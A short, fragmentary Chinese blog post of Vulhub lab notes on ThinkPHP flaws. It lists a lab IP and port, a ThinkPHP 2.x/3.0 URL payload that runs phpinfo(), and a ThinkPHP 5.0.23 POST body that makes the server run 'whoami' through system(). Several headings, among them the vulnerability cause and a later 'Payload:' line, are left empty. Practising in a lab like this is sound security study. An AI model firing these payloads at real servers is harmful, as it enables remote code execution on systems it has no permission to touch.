Vulhub笔记
Thinkphp
Thinkphp2.x,3.0
http://47.115.215.87:8080/index.php |
漏洞原因 |
?s=/index/index/name/$%7B@phpinfo()%7D (这个是编码之后的都一样,前面的三个路径也是随意) |
Thinkphp5.0.23
47.115.215.87:8080 |
47.115.215.87:8080/index.php |
_method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=whoami |
5.0<thinkphp<=5.0.22 5.1<thinkphp<=5.1.29
Payload: |
本博客所有文章除特别声明外,均采用 CC BY-NC-SA 4.0 许可协议。转载请注明来自 做 讓 人 远 远 聽 見 的 風!
评论